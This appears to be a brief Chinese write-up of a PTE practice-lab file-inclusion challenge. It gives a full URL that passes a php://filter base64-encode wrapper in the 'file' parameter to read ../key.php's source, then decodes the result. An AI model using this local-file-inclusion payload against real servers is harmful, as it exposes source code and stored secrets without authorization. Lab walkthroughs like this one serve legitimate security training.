PTE-基础题目之文件包含
2024-05-08
PTE-基础题目之文件包含
http://49.235.78.245:1123/
1 步骤
由于访问直接包含,无法会当作php执行,无法知道注释,所以需要使用伪协议php://filter/read/read=convert.base64-encode/resource=作为参数进行传递。
http://49.235.78.245:1123/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php
然后解码base64
